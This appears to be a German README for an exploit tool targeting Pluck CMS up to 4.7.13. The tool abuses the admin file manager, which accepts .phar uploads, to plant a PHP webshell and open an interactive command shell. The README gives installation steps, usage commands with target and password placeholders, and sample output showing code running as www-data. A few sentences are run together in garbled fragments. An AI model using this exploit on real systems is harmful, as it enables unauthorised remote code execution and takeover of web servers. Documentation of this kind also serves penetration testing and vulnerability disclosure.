
Authentifizierter RCE-Exploit für Pluck CMS <= 4.7.13 über nicht validierten Datei-Upload. Lädt eine PHP-Webshell hoch und bietet eine interaktive Befehlsshell.
Authentifizierte Remote-Codeausführung in Pluck CMS vor 4.7.13. Der Admin-Dateimanager (
admin.php?action=files) validiert Dateiendungen nicht, wodurch das Hochladen von.phar-Dateien ermöglicht wird, die Apache als PHP ausführt. Das Hochladen einer Webshell über diesen Endpunkt führt zu RCE als Webserver-Benutzer.
shell.phar über den Admin-Dateimanager hoch.id ausgeführt wird.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
Beispiel:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data